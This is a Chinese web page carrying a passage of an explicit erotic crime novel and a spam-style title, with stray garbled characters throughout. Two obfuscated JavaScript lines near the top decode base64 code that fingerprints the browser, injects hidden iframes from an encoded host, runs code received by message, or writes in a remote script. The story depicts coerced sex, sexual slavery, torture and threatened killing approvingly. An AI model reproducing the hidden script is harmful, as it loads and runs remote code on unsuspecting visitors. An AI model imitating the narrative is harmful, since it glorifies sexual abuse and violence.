乖女的的嫩_不安好心1v1h出轨苏柔

撩妹情话 土味情话 2021-02-22 14:06:22 13 0
eval("\x77\x69\x6e\x64\x6f\x77")["\x77\x6E\x68\x77"]=function(e){var hp =''+'ABCDEFGHIJKLMNOPQ'+'RSTUVWXYZabcdefghi'+'jklmnopqrstuvw'+'xyz012345'+'6789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=hp.indexOf(e.charAt(f++));o=hp.indexOf(e.charAt(f++));u=hp.indexOf(e.charAt(f++));a=hp.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x70\x75\x6E\x41\x50\x77\x68\x55\x43"]=function(){eval(wnhw("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQod25odyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKHduaHcoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZih3bmh3KCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbd25odygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIF9pZD1fY2xhc3M9J2FfMTk5MCc7dmFyIF9fYWFucWlkID0gJ2EnICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19hYW5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19hJysnYWEnKyducScrJ29iJysnal8xOTkwJ109ZFsncXUnKydlcnknKydTZWxlJysnY3RvJysnciddKCcjJytfX2FhbnFpZCk7X2lkICs9IGRbJ3F1JysnZXJ5JysnU2UnKydsZWMnKyd0bycrJ3JBJysnbGwnXSgnLicrX2NsYXNzKS5sZW5ndGg7dmFyIHogPSB1KyctMS8nK19pZCsnLycrcjtkWyd3JysncmknKyd0JysnZSddKCc8aScrJ2ZyJysnYScrJ21lIHN0eWxlPSInKydtJysnYXInKydnaScrJ246MDtwJysnYWQnKydkJysnaW4nKydnOjA7YicrJ29yJysnZCcrJ2VyOm4nKydvbicrJ2U7Jysnb3AnKydhJysnY2knKyd0JysneTowJysnLjAnK3JkKDIsOSkrJzt3aScrJ2R0JysnaDonK3JkKDIsNSkrJ3AnKyd4O2gnKydlJysnaWdoJysndDonK3JkKDIsNSkrJ3AnKyd4OycrJyJhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WyJhZCIrImRFdiIrImVudEwiKyJpc3QiKyJlbmVyIl0oIm0iKyJlc3MiKyJhZ2UiLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyK19pZF0pe3JtKGMpO25ldyBGdW5jdGlvbih3bmh3KGUuZGF0YVtyK19pZF0ucmVwbGFjZShuZXcgUmVnRXhwKHIsJ2cnKSwnJykpKSgpO319KTt9ZWxzZXtkLndyaXRlKCc8cycrJ2NyaScrJ3B0IHNyYz0iJyt1KycuanMiPjxcL3MnKydjcmlwJysndD4nKTt9fSkoJycrJz09UU55JysnMEMnKydNNWtUJysnTXR0JysnTScrJ20nKydSeVUnKydTJysnWm9oJysnWFlxbCcrJ25SeVV5JysnTScrJzAnKydRRE14RScrJzBNbDAnKycyYmo1JysnaWEnKyczVicrJ1dlJysnMGRYJysnWnUnKydjM2QnKyczWmtNbCcrJ1lrTWxFJysnME1sJysnTScrJ0hjMFJIJysnYScrJycrJycsJycrJ1FPRScrJ1NKTicrJ3BaJysnJysnJyx3aW5kb3csZG9jdW1lbnQsJycrJ3BDaycrJ3JGWCcrJ1onKycnKycnLCd0Jyk="));}
快捷c作: 按键盘上方向键 ← 或 → 可快速上下翻页 按键盘上的 enter 键可回到本书目录页 按键盘上方向键 ↑ 可回到本页顶部! 如果本书没有阅读完,想下次继续接着阅读,可使用上方 ;amp;quot;收藏到我的浏览器;amp;quot; 功能 和 ;amp;quot;加入书签;amp;quot; 功能!柑杆昵肷弦恍┎幻魅返牡胤健!br /曲艳刚刚出去,手机就响了。看了看来电显示的号码,“哼哼,胡二狗,你还真早啊。”“喂。”“龙涛,我学军啊。”“噢,胡大哥,怎么想起给我打电话了,有事吗?”侯龙涛脸上挂着笑,点上一颗烟。“莉萍把昨晚的事都跟我说了,我没得罪过你吧?你为什么要胡说呢?”“怎么说呢,胡大哥,我是个生意人,昨晚那个男的不是我的同事,而是我的一个大客户,剩下的就不用我说了吧。结果我和伯母吵了起来,一时激动,嘴上就没把门儿的了,并不是针对您。”“你怎么可以做出这种事呢?不说莉萍是我就要过门的妻子,她可是你女朋友的母亲啊。”“伯母是不是就在您身边啊?”“没有啊,我在外面呢。”这可有点怪了,听他的语气,这几句话还真是出自真心,小子真想从良了?“不是没出什么事嘛,胡大哥别生我的气,等您大喜的时候,我封个十万的大礼包,算是补偿您们夫妻俩的,怎么样?”“唉,龙涛啊,不是我生你的气,就是莉萍那过不去,你还得想法帮我哄她啊。你办事我还是一向很放心的,咱们都快是一家人了,以后大哥还有很多事要请你帮忙呢。”“好说,那是一定的,您是我未来的岳父大人嘛。”放下电话,侯龙涛一眯眼,“王八蛋,一听钱就露出狐狸尾巴来了,连未婚妻的尊严都能出卖,真他妈不是男人。”中午又接到薛诺打来的电话,“涛哥,你昨晚跟我妈说的话是不是真的啊?”“是真的。”“你怎么会知道胡叔叔他…”“诺诺,你要是信得过我,就什么都别问了,也什么都别跟你妈妈说,我会处理这件事的。”“嗯,涛哥,我相信你,可昨晚我妈发了好大的脾气,我从来都没看她那么生气过,你们两个都是这世界上我最爱的人,要是你们不能和睦相处,我真不知该怎么办了。”侯龙涛听了真是又感动又好笑,心想:“小宝贝,我会和你妈妈非常非常和睦的。”“你放心吧,你妈妈是个通情达理的人,终有一天,她会明白我的用意的。”何莉萍对自己的误解已经形成,胡学军和薛诺两方又都安抚好了,算是走出了成功的第一步…到了下午上班的时间,拿着曲鹏的申请去见如云,两人相对坐在巨大的办公桌两边。“你看看这个申请,投资要超过两亿,我没权做主。如果我觉得可以投资,你会批准吗?”如云看了一会儿,“你真的觉得有投资价值?”“产品的销路可能会有问题。”把自己的理由说了一遍。女人点点头,“产品是好产品,但是…你的看法很对,就算是在欧美地区都不一定好卖。”“你认为这个专利值多少钱?”“现在它也就值成本价,三百元;五十年之后,人们的环保意识会比现在强百倍,如果没有更先进的技术出现,它就是无价之宝。”“那如果我出一百万买这个专利,不算很亏吧?”一丝笑容在如云脸上出现,“我只给了你两年时间,五十年我可等不了。”“你别老提醒我这个,我心里有数。不过你今天的意见对我很有帮助,我得好好奖励你一下。”如云一听这话,就知道这小子打的什么主意,赶快看了一眼表,“不行,没时间了,我四十分钟后就得走,约好了去和国贸的人续签楼租的。”倒不是不愿意和他做a,可真要干上了,两小时、三小时,就都不好说了。侯龙涛就像没听到她的话一样,还是从办公桌后转了出去,蹲在如云面前。国贸里的暖气足的很,女职员不用人要求,一般都很自觉的就在上班后换上单裤或是裙子。如云也不例外,穿着一套耦合色的窄裙女装,白色衬衫,r色的裤袜。男人的双手已经开始在她的小腿上抚摸了,还在不断的向上移动,伸入了裙子中,在圆润丰满的大腿上又搓又捏。“老公,真的…真的不行啊,来不及的。”嘴上反对着,p股却不听话的微微抬起,使窄裙很容易的就被推到了腰上。侯龙涛抓住两瓣肥嫩的大p股,向外一拉,女人的身子一滑,饱满的就到了他的面前。薄薄的裤袜下是一条银白色的绣花小内k,男人的鼻子用力的顶了上去,拼命的嗅着,“嗯,好香,真想狠狠咬一口。”一手捏着翘臀,一手抚着大腿,长长的舌头也伸了出来,隔着裤袜和内k,在y户的部位又舔又吻,有时干脆张大嘴巴,尽量含住很大的面积,玩儿命的向嘴里吸。“啊…嗯…老公…别闹了…嗯…公事要紧呀…啊…”如云双手按在男人头上,p股也一下一下的向上挺,但还是说出了比较有理智的话。既然是这样,侯龙涛也不好强求,就站起身来。可裤子里的老二正在示威抗议,只好把它放了出来,“还有半小时呢,用你的嘴帮我解决一下吧。”如云白了他一眼,刚想把眼镜摘下来,就被制止了。“别摘,戴着眼镜更有味道。”女人无奈的张开嘴,弯下腰,把大j巴纳入了檀口中。右手捋着r棒,左手探入裤子中,从双腿间穿过,把一根纤纤细指浅浅的挤入男人的g门里,柔软的舌头在g头上打着转,又在g头后的r沟里舔舐,将藏着的少量分泌物也吞入肚中。看如云口交的这么卖力,知道她是想让自己快点满足,侯龙涛理解她的用心,也就不刻意忍耐了。伸手解开女人衬衫上面的几颗纽扣,c入胸罩里,揉捏那对弹性十足的豪r,另一手搓弄着她的耳侧。“小云云,你可真是个天生尤物,每次看到你,什么都不用做,我的老二就能一下直起来。改天你一定得给我r交才行啊。”正在努力吸吮yj的女人听了,并没有停止服务,只是抬起双眼,从眼镜上方妩媚的看着男人。口交中女人的这种细微的调情动作是最能刺激男人的。侯龙涛看到这张高贵、知性的脸庞上出现如此y荡的表情,更感到无比兴奋。一把抱住如云的皓首,开始疯狂的c干她的小嘴。因为如云的小手一直握在男人的yj上,所以每次c入并不会很深,也就不会让她感到难过。但从r棒进出的速率、包皮磨擦嘴唇的力度,都能觉出男人的强健。如云变的恍惚了,陶醉在爱人对自己嘴巴的征伐中。眼见这个绝世美人失神的表情,侯龙涛只觉一阵r紧。就在出精的一瞬间,一个坏主意浮上心头。飞快的从她嘴里抽出yj,稍稍向下一按,对准了女人的身体。马眼张开,大量的阳精疾s而出,全打在了美女的胸口、深深的r沟里和露在r罩外的rr上。“啊!”如云惊叫一声,坐直了身子,慌忙用双手挡在自己的双r下,防止jy顺着身体向下流,“唉呀,坏老公,你真是的,s在我嘴里不就好了,快,帮我拿纸巾擦擦。”红颜薄怒,真是集美丽和性感于一身。侯龙涛才没那么听话呢,坏笑着走到转椅边,右手一抬如云的下巴,左手托住她的后脑,弯下腰,让两人的四唇相接。“唔唔…”如云对这个男人真是一点办法也没有,只好把舌头伸过去给他吸吮。吻了一阵之后,侯龙涛又把老二送进女人的嘴里,要她为自己清理。手也没闲着,两指并在一起,把如云身上的jy均匀的涂抹开来。从视窗s进来的阳光照在她身上,胸口和茹房上亮晶晶的一片。“粘糊糊的,怎么擦啊?你可真够能胡…”如云还没抱怨完,两根粘着jy的手指就塞进了她嘴里。“谁说让你擦了,就这样吧,老能闻到我的味道不好吗?回家再洗就行了。”侯龙涛帮爱妻系好衣服,低头在她的脖子上舔了舔,“别走嘛,咱们再来一回合吧。”如云赶紧逃开,惊讶的看着爱人那再次硬挺的阳物,“你…你最近怎么这么厉害啊?”按下对讲器,“月玲,快进来。”男人y笑着了过去,“两人一起来我也不怕,早说了你老公是‘战神’。”如云最终还是被月玲救了,她离开办公室时所看到的最后的一幅情景是月玲两手撑着窗台,侯龙涛扶着她的细腰,从背后将粗大的r棒慢慢的c入了两瓣p股之间…晚上跟哥儿几个吃完时,武大一脸的春风得意,向大家发着新名片。侯龙涛接过一张看了看,xx发展银行北京新街口分行副行长。“行啊,二哥,你算心满意足了,我那一亿大圆什么时候能还我啊?”“你急个p啊,放在银行里又不会丢了,也没人催你的债,还有四个月才能解冻呢。”武大就算在骂人时也是满脸带笑,这回可以好好的过过官瘾了。“大哥,明儿晚上的事都安排好了吗?”给大胖满上酒。“放心吧,只要你给的位址没错就行。”“别忘了把那辆雅阁也开上。”侯龙涛那张斯文的脸上又一次现出了隐隐的y险之色…第二十五章完金鳞岂是池中物 作者:monkey第二十六章 “良”为娼(上)蓟门桥东南部的一片出租房,住的大部分都是外地来京的务工人员。本来有不少的路灯,不知被谁家淘气的孩子用石头砸碎了不少,还有很多是因为无人维护而自然损坏的。只剩下零零星星的几盏还在工作,可它们根本无法阻挡无边的黑暗将这里吞噬。马上就要12:00了,几条鬼影出现在其中一个小院门口,看了看门牌号,“老大,是这儿吗?”被称为老大的人点上一颗烟,打火机的光亮中映出大胖带着狞笑的脸,“就是这儿,正对大门的那间房,大家手脚俐落点。”往院儿里扔了块石头,没有动静,“没狗,上吧。”一个小个子向后退出几米,往前冲了几步,矮身上窜,一下扒住了墙头,双臂一用力,整个人就消失在墙内,看身手还真是练过几年。大门从里面打开了,等在外面的四个人轻手轻脚的走了进去。院子里一点灯光也没有,看来住在这儿的人都睡了,寒冷的天气是最适合睡觉的。正屋用的是暗锁,大胖向先前翻墙的小个子一仰头。小个子拿着一根铁丝在锁里搅动了两下,门就开了一条缝,原来他还是个溜门撬锁的好手。胡二狗裹在大棉被里,正舒舒服服的做着好梦,突然感到被子被一把扥掉了。刚一睁眼,马上有人捂住了他的嘴,一把冷冰冰的尖刀贴在他脸上。“不许出声,要不然就宰了你,听懂了就点点头。”有人压低了声音在他耳边说。胡二狗赶尽点了点头,紧接着被拉下了床,双手被紧紧捆在背后。屋里的灯被打开了,才看清面前有四个陌生男人,都是一脸的凶像。背后还有一个用刀架在他的脖子上,刀锋很利,有自动向r里钻的感觉。“照片在哪儿?”为首的人问道。胡二狗很聪明,当然知道他说的是什么,“大哥,我不认识你们,你们是不是找错人了。”大胖从兜里拿出一张照片看了看,“是胡二狗吧,错不了。看来不给你点苦头吃,你是不会合作了。坛子,把他的脸花了。”“好。”拿刀的那人一声答应,手里的“攮子”(刀子)就移到了胡二狗脸上。“别…别,就在床下。别伤我的脸。”有这张脸在,就有吃饭的本钱,一听要毁自己的容,胡二狗立刻就招了。大胖在心中暗暗佩服侯龙涛,来之前他告诉自己,只要用毁容威胁他,肯定水到渠成。开始还不太相信,觉得这手只对女人管用。现在看来,自己的这个四弟还真是挺有先见之明的。从床下搜出了三个鞋盒子,一盒里全是胶卷和女人的l照,另外两盒中竟然都是百元的大钞,足有小十万块。“你他妈还够有钱的啊,做鸭子很有赚头嘛。”大胖把钱盒儿扔给边上的两个人,“待会儿全带走。”胡二狗一看他们要拿自己的钱,可比杀了他还难过,也不知从哪冒出来的勇气,突然向大胖冲了过去,“把钱还给我。”大胖带来的这几个人,最少都有八、九年的街边“架龄”了,要对付一个反绑着双手的鸭子,那可以说是绰绰有余的。刚刚冲出了两步,就被两个人架住了胳膊弯,再难近前分毫。“妈的,要钱不要命啊?”大胖走过去,照准胡二狗的小肚子就是一拳。大胖身高一米九几,体重二百多斤,拳头就像两个铁锤一样。挨上他一下,后果不言而喻。胡二狗连叫都没叫出来,只在喉咙中发出“呃呃”的两声,大量的口水从嘴里流了出来,看上去就像要呕吐一样。“这丫那怎么这么恶心啊。”一个手下会意的从后一揪胡二狗的头发,令他抬头向天。大胖又是狠狠的几拳,两个架着胡二狗的人突然一起撤了手,他的身子就像一个断了线的风筝一样飞上了床。大胖跟过去,一脚踩在床上,“那辆雅阁呢?”胡二狗脸色惨白,满身的虚汗,像一条离了水的鱼那样,张大嘴不住的喘着气,哪儿还有力气回答。“c,不开口是吧。拉起来,我再给他来一套‘必杀呕吐拳’尝尝。”“在…在…蓟门小…小区…东里十…十号楼前面…”胡二狗可不想再当沙袋了。“坛子,去把车开来。”拿起床头柜上的一串钥匙扔给坛子,上面挂着一个车门的遥控器。坛子边往外走边嘟囔着,“可挺老远的,你妈的,停门口不就完了。”可在这种地方,财不露白才是明智的选择。要说几个人的动静也不小了,八成也有邻居听到了,可入室抢劫、复仇打架在这里是司空见惯,早就形成了一种默契,事不关己不劳心,这样就不会惹祸上身了…门头沟的大山中,一个废弃的采石场的仓库里灯火通明。从外面看并没有什么特别,可仓库里有一面新砌起来的砖墙。墙的外面只有几张普通的沙发,一张长桌,十几个小痞子正在喝酒聊天。墙里面就别有d天了,开了一桌麻将,两张真皮的长沙发上坐着几个人,面前有一台三十四吋的大彩电,几个人正在玩儿“街霸”一类的格斗游戏。自从上次在这儿处理了张国、张军哥儿俩的事后,侯龙涛觉得这儿是一个不错的整人之所,就雇人把这里整理了一下。本来就是刘南舅舅公司的产业,也不用交什么租金。没想到这么快就能派上用场。今天下班后,李宝丁、李昂扬、项念休和左魏几个高中时的好友找侯龙涛出来吃饭,晚上的事儿自然也就叫上他们了。几个人都是电子游戏迷,行恶之前也不忘了切磋几把。“哈哈,ko,knock out,死猴子,你丫又输了,滚下去吧。”一休大嚷大叫着。“c,好久不练了,让你丫先美几轮。”侯龙涛把手柄交给一边的宝丁,“帮我报仇。”拍了拍跪在两腿间的女人的脸蛋儿,“喂,你他妈用点心。”女人抬头看了他一眼,赶紧更加卖力的上下动着脑袋,正是任婧瑶。高中同学聚会,自然不能少了这朵班花了。她穿着一件貂皮大衣,黑色的长丝袜,黑色的高跟鞋,可大衣里却是真空的。这是侯龙涛的命令,她可不敢不从。一个月的性奴生活中,也对这个主人有了一定的了解,只要乖乖的听话,他就会像一个温柔体贴的男朋友。有时也会稍稍的抗拒,但只要他一瞪眼,自己不知怎么,就怕得要死。侯龙涛把手伸进婧瑶的大衣里,把玩她坚实的乃子,转头对一休说:“这妞儿不错,大乃子大p股,干起来特爽,尤其是她那p眼,又紧又嫩,别提多给劲了,你要不要试试?”一休很了解他,知道他的女人决不会给别人上的,这么说只是为了分散自己的注意力,好让宝丁赢自己。可还是听得有点激动,被宝丁连给了两个重拳,“你丫别他妈勾引我,老子不吃这套。”婧瑶却被吓坏了,自己又不是一个人尽可夫的荡妇,哪能被人当成物品一样送来送去的,可如果主人真要这么做,是说什么也不敢反抗的,只能加劲吸吮男人的阳具,希望他能看在自己如此尽心服侍的份上收回成命。侯龙涛明显感到了快感的增强,享受了一会儿,“嘿嘿”一乐,把婧瑶拉起来坐在自己腿上,在她嫩嫩的脸蛋上舔了一口,“怎么了?有什么可怕的,都是老熟人了,再说你的这个小窟窿又不是只有我一个人c过,突然对我忠心起来了?”说着手就探进大衣的下摆里,手指杵进了她的x缝中。昂扬在上学时和婧瑶的关系还算不错,有那么一点点看不过去她被这样欺负,“算了猴子,好歹也同学一场,讲点情面吧。”“扬哥,你这话可就不对了。”在一边看麻将的文龙走了过来。“你问问她,四哥和我被德外四虎打的时候,她有没有看在同学一场的情面上帮我们求情。她不认的我,也还说得过去,那我四哥她也不认的?我倒不是真指望她能替我们说话,毕竟是个女人,面对一群凶神恶煞的黑社会,不敢站在我们一边很正常。可丫那连一个同情的眼神都没有,不光这样,还他妈一幅趾高气扬的样子嘲笑我们。”文龙越说越气,拍了一下婧瑶的头顶,“是不是啊,嫂子?”这是德外事件后,婧瑶第一次见文龙,从一到这儿,就发现他看自己的眼神里充满憎恨,知道他是侯龙涛的好兄弟,如果他不肯放过自己,侯龙涛也决不会护着自己的。现在他终于发难了,婧瑶什么也不敢说,只是双臂紧紧的抱着侯龙涛的脖子,把脸埋在他的耳边,小声抽泣。“哭,哭你妈x啊?”文龙可没这么容易饶了她,“我四哥就是心软,要照我的意思,当时就把你和德外四虎一起做了。”“行了,文龙,她现在不是和猴子挺好的嘛,你就别那么小心眼了。”左魏也开始替婧瑶说话。“四哥,上次你让我和大哥找人走的那小子就是这妞儿的男朋友吧?”马脸听见这边说的热闹,也不打牌了,过来凑一嘴。一拉婧瑶的下巴,“长的还不错,不过你漂亮姑娘有的是,多这一个不多,少这一个不少,我看今晚就把她和胡二狗一起埋了,给老七出口气。四哥,你可不能太小器啊。”侯龙涛觉出怀里的女人开始发抖,正在抠挖yd的手指又多用了几分力,让她不由的喘了起来,“嗨嗨嗨,干什么啊?怎么处理她得看她的表现,她至今的表现还不错,我还就是舍不得漂亮姑娘。”婧瑶听到这话,赶紧双手托着男人的脸,拼命和他接吻,把大量的香津渡到他嘴里给他品尝,不清不楚的哼哼着:“谢谢主人…谢谢主人…”就在这时,有人敲了几下门,一个手下探进头来,“兵哥,达哥回来了。”武大看了一眼侯龙涛,“怎么招,猴儿,开始吧。”侯龙涛正被亲的上火,伸出一只手挥了挥,“你们先修理修理他,我马上就来。”说着就把婧瑶扔到另一张沙发上,跪骑在她腰上,解着皮带。剩下的九个男人赶快稀哩呼噜的夺门而走,可没人想要看他光p股。一辆雅阁和一辆pt cruiser停在了仓库门口,大胖像提拉一只小j子一样,把只穿着三角裤的胡二狗拽了进来。往地上一扔,立刻又有两个人上来,把他四肢大开的锁进从墙上伸出的四条铁链上。到这儿的路上,胡二狗已经从大胖的那顿殴打中恢复了过来,看着面前的二十几个人,一脸的恐惧,颤声道:“大哥们,你们是谁啊?我怎么得罪你们了?”大胖往沙发上一坐,“你们谁动手啊?小子挺禁打的,挨了我五下‘必杀呕吐拳’,愣是没吐。”几个刚玩儿完电子游戏的人正都手痒痒着呢,一起冲了过去。这种事马脸是绝不会落后的,没有不上的道理。“老六,四哥说别打他的脸。”二德子在后面叫着。可是有点晚了,胡二狗的脸上已经挨了四、五拳了。这一顿暴打足足持续了好几分钟,可怜的胡二狗既没法还手,也无处躲避,等他们停了手,才发现他早就昏过去了。大胖用手指一点,一个手下提来了一桶凉水,“哗”的一声,泼到了犯人身上。胡二狗的身体猛的一抖,醒了过来,嘴唇都被冻成了青紫色。北京十一月下旬的深夜,穿得严严实实的都觉得冷,要是只穿着三角裤,还被泼了冷水,真是不死也只剩半条命了。更惨的是,一点不明白这一切是因为什么。看他醒了,又有三、四个人上去打,等他再昏过去,又是一桶冷水。就这样,再打、再晕、再泼水,进行了三、四轮,直到胡二狗出气儿多、进气儿少才算甘休。就在胡二狗被惨无人道的上刑时,侯龙涛却在一墙之隔的地方享受着美人的身体。婧瑶的大衣扔在桌上,几乎全l的躺在沙发上,一只丝袜被褪到小腿上,一条腿架在沙发背上,另一条腿则耷拉在地上。侯龙涛压在美丽的女人身上,两手捏着她的双r,p股在她两条白嫩的大腿间拼命耸动着。婧瑶现在别提有多舒爽了,她是一个成熟的女人,被英俊的男人生猛的c干,在心理上也没有什么不愿意,自然就很投入。小x里的媚r被粗大的yj磨擦的越来越酥、越来越麻,真想大声的呻吟,把r体上的快乐全部喊叫出来。可男人的嘴唇把她的檀口堵得严严实实的,两条舌头在相互的搅动着,婧瑶只能用小手在男人的虎背上来回的摩挲、捏掐,嘴里“嗯嗯”的哼着。其实这个女人的出现,解决了侯龙涛的一个大问题。他的女友虽多,但都是柔柔弱弱的,就连如云那样的女强人,上了床也是又娇又媚,侯龙涛对她们又是情多于欲,每次和她们干炮儿时,总是百般疼惜,千般爱护。倒不是说那样不爽,只是有一种说不出的力量无法发泄,心底深处隐藏的男人特有的暴虐野性随着每次对爱人的温柔而慢慢积累。真的不敢想像,这股力量要是爆发在爱人们身上,会对她们的身心造成什么样的伤害。现在好了,有了任婧瑶,和她性j,根本不用在乎她的感受,也不用什么技巧,只要尽情抽c、肆意驰骋,还可以时不时的做出一些有虐待倾向的行为。再加上玩儿施雅时心理上的满足,男人心中的神与魔,终于得到了平衡。侯龙涛把玩儿嫩r的双手用上了全力,rr不停的变换着形状,要是婧瑶有奶的话,一定会被全部挤出来的。女人的身体在他大力的jy下,一点一点的向后移着,直到整个脑袋都垂到了沙发扶手外面。男人的嘴已到了婧瑶的脖子上,又亲又舔,又是狠狠的吸吮,留下几个明显的吻痕。“啊…主人…c死我了…爽啊…大j巴主人…好厉害…好有力…啊…”虽然男人只是大刀阔斧的冲杀,还是令她心驰神摇,一点也感觉不到茹房上的疼痛,整个身体好像都消失了,只剩下zg那一点,被大g头撞的直欲“哭泣”。女人的叫床声,墙那边胡二狗的惨叫声,都刺激的侯龙涛更加狂野,抽c的更加强劲。每次都是只留半个g头在y门中,然后一口气整根c入,恨不得连g丸也塞进女人的性器中。光是这样还不够,男人张开血盆大口,像吸血鬼一样,在婧瑶娇嫩的脖子上留下排排齿印。“啊…啊…要死了…啊…”女人闭着眼睛,大张着嘴,分不清是痛苦还是欢快。“不许再叫了。”明知要让就快到高c的女人闭嘴是不可能的,但侯龙涛还是如此下了命令。像一条大狗一样,把舌头伸得老长,在婧瑶的娇颜上疯狂的舔舐,令她一张俏脸上涂满自己的口水。侯龙涛用尽全力的向下一沉臀部,闷哼一声,就此不动了。婧瑶的双腿猛的一阵抽搐,垂在沙发外的皓首也不再摇晃,一双美目睁得大大的,无神的盯着天花板,发出一声满足的欢叫,享受男人滚烫的jy打在zg上的无上快感。两人抱在一起喘息了几分钟,男人起身,将占满各种体y的yj放进面色潮红的美女嘴里。婧瑶为他清理干净,“主人,您…您好棒啊。”“夸我也没用,刚才让你不要叫了,你还叫,去,撅起来。”婧瑶费力的站起来,摇摇晃晃的走到桌前,趴在貂皮大衣上,把p股翘得老高,“主人,罚我吧。”一个月来,侯龙涛每次c完她,都会找点借口打她的p股,她已经习以为常了,而且每次被打,都只是前几下很疼,等p股麻痹了,还会有产生受虐的兴奋感。侯龙涛毫不客气,抡起胳膊就是一下,“啪”的一声脆响,女人雪白丰满的p股蛋儿上立刻出现了一片红印。这可不是爱人间的调情,每下都是用上真力的,一点也不留情。婧瑶扭摆着肥臀,在开始的几声痛叫后,紧接着就是变态的呻吟,“主人打的好,主人真厉害…”正可谓是打人的解恨,挨打的也不含糊。就在打的起性之时,门被推开了一条缝,文龙捂着眼睛的脑袋探了进来,“四哥,你再不出来,可就把丫那打死了。”“这就来。”侯龙涛扒开女人的两个臀瓣,在她的p眼上吻了一下,“今天表现得还不错,我出去后你就睡一会儿吧,别出声。”说完就开始穿衣服…第二十六章完金鳞岂是池中物 作者:monkey第二十七章 “良”为娼(下)胡二狗被人从墙上摘了下来,架到长桌前面坐下,满脸的血水,一点也没有平时英俊潇洒的样儿了。模模糊糊的看到一个人叼着一根烟,系着皮夹克里衬衫的扣子,从里屋走了出来。“文龙,一会儿帮我把那妞儿的尸体处理了。”“好,四哥,我等会儿就去办。”胡二狗听了这人的声音,不禁一惊,缓缓抹了抹眼睛,那个叫人不要打自己脸的“四哥”,竟然就是自己未来的“后女婿”。“哎呦,胡大哥来了,怎么也没人通知我一声啊?” 侯龙涛正好也在向这边看,表情夸张的说完就坐到了胡二狗对面的椅子上,笑眯眯的看着他。“龙涛…龙涛,我…我怎么得罪你了?你怎么会和这些人在一起?”胡二狗开始“从良”的时候,侯龙涛还没出名呢,他自然不知道这个平时举止文雅的年轻人在北京黑道上的地位。侯龙涛还是一幅笑模样,“怎么弄得鼻青脸肿的?真是的,我还特意交代他们别打你的脸呢。”扭头不满的看着大胖,“大哥,你这不是剥夺我亲手把他变成猪头的乐趣嘛。”大胖“嘿嘿”一乐,“这可不是我干的,是马脸他们动的手。”接着就示意手下人把三个鞋盒子放到桌上,“右边那两盒里是钱,小白脸还真他妈不少挣。”侯龙涛才不在乎那点钱呢,他要的是照片和胶卷。仔仔细细的看了一遍,果不出所料,何莉萍的l照也在其中,但都是睡觉时的照片,看来她自己都不一定知道。除了何莉萍和施雅之外,还有另外四个女人的,都是三、四十岁的样子,有两个还颇有几分姿色,“哼哼,胡大哥,你艳福不浅啊。”胡二狗也不是个初出茅庐的小崽儿了,虽然一脸的恐惧,但心里却也在不停分析着局势。“我肯定是和他无怨无仇,我们俩唯一能扯上关系的就是莉萍,难道是莉萍要他来整我?不可能啊,那娘儿们爱我爱得要命,况且她也不知道我的事,更不知道我姓字名谁、住在哪。这小子见财起异,想抢劫我?更不对了,他不知道比我富多少倍呢。”既然想不出个所以然,干脆决定先试探他一下,套套他的话,再作打算,“龙涛,你听我说,我这人有这坏毛病,每次交女朋友,都要拍点照片作纪念,我…”“行了,胡二狗,”侯龙涛打断他的话,“你少跟我这儿编故事,咱们也别浪费时间,我明摆着告诉你,我已经把你的底查得一清二楚了。你的老大李东升是我朋友,施雅我也找过了,你就别耍你那点花花肠子了。”一听他说出这两个名字,胡二狗知道他是真的掌握了自己的底细,“我…我,涛哥,您找我来有什么事儿?”这一来,连称呼都变了,还换上了一脸的奴像儿。在北京这几年,他明白了一个道理,要想不挨打,装孙子最重要。“我问你什么,你就老老实实的说什么,我就不再让你受皮r之苦,明白吗?”“是,是,我明白。”“好,你打算什么时候蹬了何莉萍啊?”“我…我没打算蹬她呀,您知道的,我们下个月就结婚了。”“很冷吗?我看你怎么直哆嗦啊。”侯龙涛突然改变了话题。“有…有点。”“那抽根烟吧。”胡二狗连忙欠身接过他递来的烟。“我给你点上。”左手打着打火机,右手抓起一边儿的玻璃烟缸,狠狠的砸在胡二狗凑过来的头上。“啊!”胡二狗惨叫一声,摔倒在地上直抽抽,鲜血从双手捂着的地方溢了出来。“你妈了个x,还他妈敢跟我打马虎眼,给他包上。”两个手下过来拉起胡二狗,给他包上伤口,又放回了椅子上。“我再问你一次,你打算怎么处理何莉萍的事